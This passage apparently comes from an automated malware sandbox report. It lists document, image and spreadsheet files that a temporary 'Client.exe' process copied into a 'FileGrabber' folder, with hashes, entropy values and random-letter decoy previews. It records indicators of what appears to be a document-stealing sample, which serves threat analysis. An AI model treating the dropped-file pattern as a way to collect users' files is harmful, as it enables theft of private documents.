QVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\ProgramData\134349\FileGrabber\Documents\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\ProgramData\134349\FileGrabber\Documents\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\ProgramData\134349\FileGrabber\Documents\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\ProgramData\134349\FileGrabber\Documents\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\ProgramData\134349\FileGrabber\Documents\ONBQCLYSPU\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\134349\FileGrabber\Documents\ONBQCLYSPU\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\ProgramData\134349\FileGrabber\Documents\ONBQCLYSPU\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\ProgramData\134349\FileGrabber\Documents\ONBQCLYSPU\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\ProgramData\134349\FileGrabber\Documents\ONBQCLYSPU\WUTJSCBCFX.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Reputation:	unknown
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\ProgramData\134349\FileGrabber\Documents\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\ProgramData\134349\FileGrabber\Documents\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
